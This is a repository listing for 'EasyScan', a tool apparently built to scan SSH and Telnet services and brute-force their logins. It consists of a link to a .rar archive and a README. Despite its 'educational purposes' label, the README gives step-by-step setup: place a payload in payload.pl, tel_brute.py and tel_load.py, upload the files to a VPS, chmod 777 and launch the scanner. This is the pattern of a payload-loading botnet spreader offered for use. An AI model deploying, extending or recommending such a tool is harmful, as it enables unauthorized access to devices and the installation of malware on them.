├── EasyScan.rar └── README.md /EasyScan.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KnowledgeCharity/EasyScan/4141fbe3764da82993906ccaf268fb6da6e74cfd/EasyScan.rar -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # EasyScan 2 | Scanner For Educational Purposes.
3 | Scans SSH & Telnet protocols to find and brute.
4 | Easy to use and recieves auto updates and free lists etc.
5 | Will be adding exploits and other features eventually + tutorials for educational purposes.
6 | #Hidden Commands#
7 | Case Sensetive-
8 | i = Info About the Tool.
9 | l = Shows all List in (Created List Directory)List directory.
10 | #HELP#
11 | Easy Scan Set Up (Centos/Debian Bases)
12 | 1.) Put Your Payload In "payload.pl"
13 | 2.) Put Your Payload In "tel_brute.py"
14 | 3.) Put Your Payload In "tel_load.py"
15 | 4.) Move All Files In Your VPS (via WinSCP, FileZilla, MobaXTerm)
16 | 5.) type chmod 777 * in your VPS terminal
17 | 6.) ./scan
18 | 7.) Once the scanner has started Pick option I to install dependencies so your scanning stuff works.
19 | Enjoy Your Easy Scan, Hope it makes scanning easier for you. If you need to manually install the
20 | dependencies then type ./i in your VPS terminal.
21 | --------------------------------------------------------------------------------